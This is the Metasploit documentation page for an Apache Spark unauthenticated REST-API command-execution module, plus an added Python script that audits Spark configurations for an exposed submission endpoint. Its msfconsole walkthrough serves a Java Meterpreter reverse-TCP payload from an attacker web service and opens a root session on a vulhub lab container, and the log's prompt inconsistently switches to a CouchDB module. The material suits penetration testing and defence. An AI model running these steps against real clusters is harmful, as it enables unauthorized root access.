metasploit-framework/documentation/modules/exploit/linux/http/spark_unauth_rce.md


Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark running in standalone cluster mode, reachable through the REST API. It uses the CreateSubmissionRequest function to submit a malicious Java class and trigger it.
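A defender-side check for the exposure described above, as an added example that is not part of the Metasploit module or its documentation: it reads a Spark master's properties and reports whether the REST submission endpoint is enabled. The property names are Spark configuration settings; treating a missing `spark.master.rest.enabled` as enabled, the function names and the sample configurations are assumptions made for this example.

```python
import re

REST_ENABLED = "spark.master.rest.enabled"
REST_PORT = "spark.master.rest.port"
AUTHENTICATE = "spark.authenticate"
LINE = re.compile(r"([^\s=]+)\s*[=\s]\s*(.*)")


def parse_properties(text):
    """Parse spark-defaults.conf style text ('key value' or 'key=value')."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        match = LINE.fullmatch(line)
        if line.startswith("#") or match is None:
            continue  # comment, blank line, or key without a value
        props[match.group(1)] = match.group(2).strip()
    return props


def audit_master(props, rest_default_enabled=True):
    """Return findings about the master's REST submission endpoint."""
    # Assumption: a missing key counts as enabled, the conservative
    # reading when the Spark release and its default are not known.
    raw = props.get(REST_ENABLED)
    enabled = rest_default_enabled if raw is None else raw.lower() == "true"
    if not enabled:
        return []
    port = props.get(REST_PORT, "6066")  # 6066 is the port in the scenario
    how = "by default (key not set)" if raw is None else "explicitly"
    findings = [f"REST submission endpoint enabled {how} on port {port}"]
    if props.get(AUTHENTICATE, "false").lower() == "true":
        findings.append("spark.authenticate is true, but the REST submission "
                        "server does not support authentication")
    findings.append(f"set {REST_ENABLED}=false or restrict port {port} "
                    "to trusted submitters")
    return findings


# Constructed sample configurations (not taken from a real cluster).
EXPOSED = """
# master left on defaults
spark.master            spark://master:7077
spark.authenticate      true
"""
HARDENED = "spark.master.rest.enabled=false\nspark.master.rest.port 6066\n"

if __name__ == "__main__":
    for name, conf in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, audit_master(parse_properties(conf)))
```

Pass `rest_default_enabled=False` when auditing a release whose documentation states that the REST server is off unless enabled.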

Verification Steps

https://github.com/vulhub/vulhub/tree/master/spark/unacc

docker-compose up -d

Verification Steps

  1. get session on target
  2. use exploit/linux/http/spark_unauth_rce
  3. set payload <payload>
  4. set rhosts <rhosts>
  5. set rport <rport>
  6. set srvhost <srvhost>
  7. set srvport <srvport>
  8. set lport <lport>
  9. set lhost <lhost>
  10. exploit

Scenarios

Spark 2.3.1

msf5 > use exploit/linux/http/spark_unauth_rce
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf5 exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions

Active sessions
===============

  Id  Name  Type                    Information          Connection
  --  ----  ----                    -----------          ----------
  2         meterpreter java/linux  root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >